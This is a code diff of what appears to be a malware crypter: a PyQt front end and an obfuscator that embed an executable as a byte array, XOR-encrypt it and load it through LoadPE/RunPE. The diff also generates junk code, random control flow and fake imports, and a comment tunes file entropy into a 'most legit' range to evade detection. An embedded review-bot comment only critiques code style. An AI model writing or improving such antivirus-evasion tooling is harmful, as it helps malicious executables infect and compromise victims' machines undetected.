update
21
gui.py
21
gui.py
@@ -9,12 +9,11 @@
|
|||||||
|
|
||||||
"""
|
"""
|
||||||
TODO :
|
TODO :
|
||||||
- LoadPE (KEKW)
|
|
||||||
- Good Section sizes
|
- Good Section sizes
|
||||||
- Random Windows API calls (help)
|
- Random Windows API calls (help)
|
||||||
|
|
||||||
Done :
|
Done :
|
||||||
- RunPE
|
- LoadPE
|
||||||
- Junk code
|
- Junk code
|
||||||
- Control flow
|
- Control flow
|
||||||
- IAT obfuscation (adding "normal" imports in addition to the others)
|
- IAT obfuscation (adding "normal" imports in addition to the others)
|
||||||
@@ -23,6 +22,12 @@ Done :
|
|||||||
- Code signing
|
- Code signing
|
||||||
- Good entropy
|
- Good entropy
|
||||||
- Add resources (random number of random generated bitmaps) --> Not used because it increases the entropy too much
|
- Add resources (random number of random generated bitmaps) --> Not used because it increases the entropy too much
|
||||||
|
|
||||||
|
Note about entropy :
|
||||||
|
Entropy: between 0 and 8
|
||||||
|
"Most legit" range : [4.8; 6.8]
|
||||||
|
"Most malicious" range : [7.2; 8.0]
|
||||||
|
Best entropy : 6.4
|
||||||
"""
|
"""
|
||||||
|
|
||||||
from PyQt5 import QtCore, QtGui, QtWidgets
|
from PyQt5 import QtCore, QtGui, QtWidgets
|
||||||
@@ -38,6 +43,7 @@ class Ui_mainWindow(object):
|
|||||||
self.xor = False
|
self.xor = False
|
||||||
self.cflow = False
|
self.cflow = False
|
||||||
self.junk = False
|
self.junk = False
|
||||||
|
self.filepath = ""
|
||||||
self.icon_path = ""
|
self.icon_path = ""
|
||||||
|
|
||||||
def setupUi(self, mainWindow):
|
def setupUi(self, mainWindow):
|
||||||
@@ -79,7 +85,7 @@ class Ui_mainWindow(object):
|
|||||||
self.spinBox = QtWidgets.QSpinBox(self.centralwidget)
|
self.spinBox = QtWidgets.QSpinBox(self.centralwidget)
|
||||||
self.spinBox.setGeometry(QtCore.QRect(155, 118, 42, 22))
|
self.spinBox.setGeometry(QtCore.QRect(155, 118, 42, 22))
|
||||||
self.spinBox.setObjectName("spinBox")
|
self.spinBox.setObjectName("spinBox")
|
||||||
self.spinBox.setValue(6)
|
self.spinBox.setValue(8)
|
||||||
self.spinBox.setMinimum(1)
|
self.spinBox.setMinimum(1)
|
||||||
self.label_3 = QtWidgets.QLabel(self.centralwidget)
|
self.label_3 = QtWidgets.QLabel(self.centralwidget)
|
||||||
self.label_3.setGeometry(QtCore.QRect(120, 122, 47, 13))
|
self.label_3.setGeometry(QtCore.QRect(120, 122, 47, 13))
|
||||||
@@ -90,7 +96,7 @@ class Ui_mainWindow(object):
|
|||||||
self.spinBox_2 = QtWidgets.QSpinBox(self.centralwidget)
|
self.spinBox_2 = QtWidgets.QSpinBox(self.centralwidget)
|
||||||
self.spinBox_2.setGeometry(QtCore.QRect(155, 138, 42, 22))
|
self.spinBox_2.setGeometry(QtCore.QRect(155, 138, 42, 22))
|
||||||
self.spinBox_2.setObjectName("spinBox_2")
|
self.spinBox_2.setObjectName("spinBox_2")
|
||||||
self.spinBox_2.setValue(2)
|
self.spinBox_2.setValue(3)
|
||||||
self.spinBox_2.setMinimum(1)
|
self.spinBox_2.setMinimum(1)
|
||||||
self.checkBox_3 = QtWidgets.QCheckBox(self.centralwidget)
|
self.checkBox_3 = QtWidgets.QCheckBox(self.centralwidget)
|
||||||
self.checkBox_3.setGeometry(QtCore.QRect(20, 140, 91, 16))
|
self.checkBox_3.setGeometry(QtCore.QRect(20, 140, 91, 16))
|
||||||
@@ -135,8 +141,8 @@ class Ui_mainWindow(object):
|
|||||||
self.checkBox_3.setText(_translate("mainWindow", "Control flow"))
|
self.checkBox_3.setText(_translate("mainWindow", "Control flow"))
|
||||||
|
|
||||||
def generate(self) :
|
def generate(self) :
|
||||||
in_filename = self.pushButton.text()
|
in_filename = self.filepath
|
||||||
out_filename = in_filename.split(".")[0] + "_out.exe"
|
out_filename = self.pushButton.text().split(".")[0] + "_out.exe"
|
||||||
xor_key = ''
|
xor_key = ''
|
||||||
|
|
||||||
if self.xor :
|
if self.xor :
|
||||||
@@ -152,6 +158,7 @@ class Ui_mainWindow(object):
|
|||||||
self.label_2.setText("Creating sample header...")
|
self.label_2.setText("Creating sample header...")
|
||||||
QCoreApplication.processEvents()
|
QCoreApplication.processEvents()
|
||||||
|
|
||||||
|
print(f"Filename : {in_filename}")
|
||||||
file = bytearray(open(in_filename, 'rb').read())
|
file = bytearray(open(in_filename, 'rb').read())
|
||||||
with open("sample.h", 'w') as output:
|
with open("sample.h", 'w') as output:
|
||||||
output.write("unsigned char sample[] = { ")
|
output.write("unsigned char sample[] = { ")
|
||||||
@@ -171,6 +178,7 @@ class Ui_mainWindow(object):
|
|||||||
# Working with a copy of main.cpp
|
# Working with a copy of main.cpp
|
||||||
os.rename("main.cpp", "DO_NOT_TOUCH.cpp")
|
os.rename("main.cpp", "DO_NOT_TOUCH.cpp")
|
||||||
shutil.copyfile('DO_NOT_TOUCH.cpp', 'main.cpp')
|
shutil.copyfile('DO_NOT_TOUCH.cpp', 'main.cpp')
|
||||||
|
|
||||||
with open("config.h", "w") as c :
|
with open("config.h", "w") as c :
|
||||||
c.write(f'#pragma once\n#define KEY "{xor_key}"')
|
c.write(f'#pragma once\n#define KEY "{xor_key}"')
|
||||||
|
|
||||||
@@ -240,6 +248,7 @@ class Ui_mainWindow(object):
|
|||||||
if filePath:
|
if filePath:
|
||||||
# Display the selected file path in the QLineEdit
|
# Display the selected file path in the QLineEdit
|
||||||
self.pushButton.setText(filePath.split("/")[-1:][0])
|
self.pushButton.setText(filePath.split("/")[-1:][0])
|
||||||
|
self.filepath = filePath
|
||||||
|
|
||||||
|
|
||||||
def IconfileDialog(self):
|
def IconfileDialog(self):
|
||||||
|
|||||||
@@ -10,7 +10,7 @@ Creates :
|
|||||||
- Random control flow
|
- Random control flow
|
||||||
"""
|
"""
|
||||||
|
|
||||||
types = ["short", "unsigned short", "int", "unsigned int", "long", "unsigned long", "float", "double"]
|
types = ["short", "unsigned short", "int", "unsigned int", "long", "unsigned long"] #"float", "double"]
|
||||||
operations = ["-", "+", "^", "*", "/"]
|
operations = ["-", "+", "^", "*", "/"]
|
||||||
global_vars = {}
|
global_vars = {}
|
||||||
functions = []
|
functions = []
|
||||||
@@ -60,8 +60,10 @@ def GetRandomFunction() :
|
|||||||
functions.append(name)
|
functions.append(name)
|
||||||
|
|
||||||
body = "int "+name+"(const char* a1) {\n"
|
body = "int "+name+"(const char* a1) {\n"
|
||||||
|
body += "\tif (a1 <= (void*)0x00100000) return 0;\n"
|
||||||
|
body += "\tchar aaa = ((char)((int)'0' + 1));\n"
|
||||||
body += f"\tint bb = {GetRandomNumber()};\n"
|
body += f"\tint bb = {GetRandomNumber()};\n"
|
||||||
body += "\tfor (int i = 0; i < 10; i++) {\n\t\tCreateMutexA(NULL, false, a1);\n\t\tbb++;\n\t}\n\treturn bb;\n}"
|
body += "\tfor (int i = 0; i < 10; i++) {\n\t\tCreateMutexA(NULL, false, &aaa);\n\t\tbb++;\n\t}\n\treturn bb;\n}"
|
||||||
|
|
||||||
return body
|
return body
|
||||||
|
|
||||||
@@ -79,7 +81,7 @@ def GetAsmBlock(branch1, branch2, var, end, sub) :
|
|||||||
"""+branch1+""":"""
|
"""+branch1+""":"""
|
||||||
|
|
||||||
|
|
||||||
if GetRandomRange(0, 4) > 1 :
|
if GetRandomRange(0, 4) > 2 :
|
||||||
branch1 = GetRandomString(20)
|
branch1 = GetRandomString(20)
|
||||||
branch2_ = GetRandomString(20)
|
branch2_ = GetRandomString(20)
|
||||||
asm_block += GetAsmBlock(branch1, branch2_, var, end, sub)
|
asm_block += GetAsmBlock(branch1, branch2_, var, end, sub)
|
||||||
@@ -100,7 +102,7 @@ def GetRandomAssemblyBlock() :
|
|||||||
|
|
||||||
r = """const char* """+var+""" = \""""+GetRandomString(5)+"""\";\n__asm {"""
|
r = """const char* """+var+""" = \""""+GetRandomString(5)+"""\";\n__asm {"""
|
||||||
|
|
||||||
for i in range(GetRandomRange(0, 30)) :
|
for i in range(GetRandomRange(0, 15)) :
|
||||||
branch1 = GetRandomString(20)
|
branch1 = GetRandomString(20)
|
||||||
branch2 = GetRandomString(20)
|
branch2 = GetRandomString(20)
|
||||||
end = GetRandomString(20)
|
end = GetRandomString(20)
|
||||||
@@ -113,11 +115,11 @@ def generate_switch_statement(variable_name, exit_value, depth=0):
|
|||||||
indent = " " * depth
|
indent = " " * depth
|
||||||
switch_code = f"{indent}switch ({variable_name}) {{\n"
|
switch_code = f"{indent}switch ({variable_name}) {{\n"
|
||||||
|
|
||||||
num_cases = GetRandomRange(2, 5)
|
num_cases = GetRandomRange(1, 4)
|
||||||
for _ in range(num_cases):
|
for _ in range(num_cases):
|
||||||
case_value = GetRandomRange(1, 10**6)
|
case_value = GetRandomRange(1, 10**6)
|
||||||
switch_code += f"{indent} case {case_value}:\n"
|
switch_code += f"{indent} case {case_value}:\n"
|
||||||
if depth < 2 and GetRandomRange(0, 4) > 1 :
|
if depth < 2 and GetRandomRange(0, 4) > 2 :
|
||||||
switch_code += generate_switch_statement(variable_name, exit_value, depth + 1)
|
switch_code += generate_switch_statement(variable_name, exit_value, depth + 1)
|
||||||
else:
|
else:
|
||||||
switch_code += f"{indent} {{\n"
|
switch_code += f"{indent} {{\n"
|
||||||
@@ -146,6 +148,7 @@ def GetRandomControlFlow():
|
|||||||
|
|
||||||
return cpp_code
|
return cpp_code
|
||||||
|
|
||||||
|
FILES_TO_OBFUSCATE = {"main.cpp":"DO_NOT_TOUCH.cpp"}# "getapi.cpp":"DO_NOT_TOUCH_API.cpp"}
|
||||||
def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
|
def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
|
||||||
if PASS < CFLOW_PASS : PASS = CFLOW_PASS
|
if PASS < CFLOW_PASS : PASS = CFLOW_PASS
|
||||||
|
|
||||||
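Review bot: `FILES_TO_OBFUSCATE` maps output file to input file, which reads backwards from the name and is only made clear by the `for outfile, infile in FILES_TO_OBFUSCATE.items()` unpacking in the next hunk; a comment on the definition would help, e.g. `# output path -> pristine copy it is regenerated from on each pass`. The trailing commented-out dictionary entry on the same line should be removed rather than left as dead code; if a second file is planned, a `# TODO` line states that more clearly.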
@@ -156,8 +159,11 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
|
|||||||
global in_func
|
global in_func
|
||||||
func_def_pattern = r'\b\w+\s+\w+\s*\([^)]*\)\s*'
|
func_def_pattern = r'\b\w+\s+\w+\s*\([^)]*\)\s*'
|
||||||
|
|
||||||
f = open("DO_NOT_TOUCH.cpp", "r")
|
for outfile, infile in FILES_TO_OBFUSCATE.items():
|
||||||
o = open("main.cpp", "w")
|
if PASS == 0 : break;
|
||||||
|
|
||||||
|
f = open(infile, "r")
|
||||||
|
o = open(outfile, "w")
|
||||||
out = []
|
out = []
|
||||||
|
|
||||||
lines = f.readlines()
|
lines = f.readlines()
|
||||||
@@ -165,8 +171,10 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
|
|||||||
in_comment = False
|
in_comment = False
|
||||||
in_switch = False
|
in_switch = False
|
||||||
in_asm = False
|
in_asm = False
|
||||||
|
in_dowhile = False
|
||||||
can_code = False
|
can_code = False
|
||||||
wait_for_func_close = False
|
wait_for_func_close = False
|
||||||
|
in_debug = False
|
||||||
global_vars = {}
|
global_vars = {}
|
||||||
functions = []
|
functions = []
|
||||||
out = []
|
out = []
|
||||||
@@ -198,17 +206,29 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
|
|||||||
pass
|
pass
|
||||||
elif "break;" in line and can_code :
|
elif "break;" in line and can_code :
|
||||||
can_code = False
|
can_code = False
|
||||||
|
if "#ifdef _DEBUG" in line :
|
||||||
|
in_debug = True
|
||||||
|
elif in_debug and "#endif" in line :
|
||||||
|
in_debug = False
|
||||||
|
continue
|
||||||
|
if "do {" in line :
|
||||||
|
in_dowhile = True
|
||||||
|
elif in_dowhile and "while" in line :
|
||||||
|
in_dowhile = False
|
||||||
|
continue
|
||||||
|
|
||||||
|
if in_debug : continue
|
||||||
|
if in_dowhile : continue
|
||||||
a = "{" in line or "}" in line or "#" in line
|
a = "{" in line or "}" in line or "#" in line
|
||||||
b = re.search(func_def_pattern, line) != None
|
b = re.search(func_def_pattern, line) != None
|
||||||
|
|
||||||
if not can_code :
|
if not can_code :
|
||||||
if b or a or in_comment or in_switch or in_asm : continue # we can't write
|
if b or a or in_comment or in_switch or in_asm : continue # we can't write
|
||||||
|
|
||||||
if GetRandomBool() and junk : # do we create a variable ?
|
if GetRandomBool() and junk and k < PASS : # do we create a variable ?
|
||||||
out.append(GetRandomVar()+"\n")
|
out.append(GetRandomVar()+"\n")
|
||||||
|
|
||||||
if GetRandomBool() and in_func and junk: # do we do an operation on globals ?
|
if GetRandomBool() and in_func and junk and k < PASS : # do we do an operation on globals ?
|
||||||
out.append(GetRandomOperation()+"\n")
|
out.append(GetRandomOperation()+"\n")
|
||||||
|
|
||||||
if GetRandomBool() and not in_func : # do we create a function ?
|
if GetRandomBool() and not in_func : # do we create a function ?
|
||||||
@@ -281,6 +301,7 @@ DWORD ADVAPI32214_Array[] = { (DWORD)RegCreateKeyA, (DWORD)RegSetValueA, (DWORD)
|
|||||||
#include <Prsht.h>\r\n
|
#include <Prsht.h>\r\n
|
||||||
#include <Userenv.h>\r\n"""
|
#include <Userenv.h>\r\n"""
|
||||||
|
|
||||||
|
if outfile == "main.cpp" :
|
||||||
out.insert(0, fake_api)
|
out.insert(0, fake_api)
|
||||||
out.insert(0, static_imports)
|
out.insert(0, static_imports)
|
||||||
out.insert(0, fake_libs)
|
out.insert(0, fake_libs)
|
||||||
|
|||||||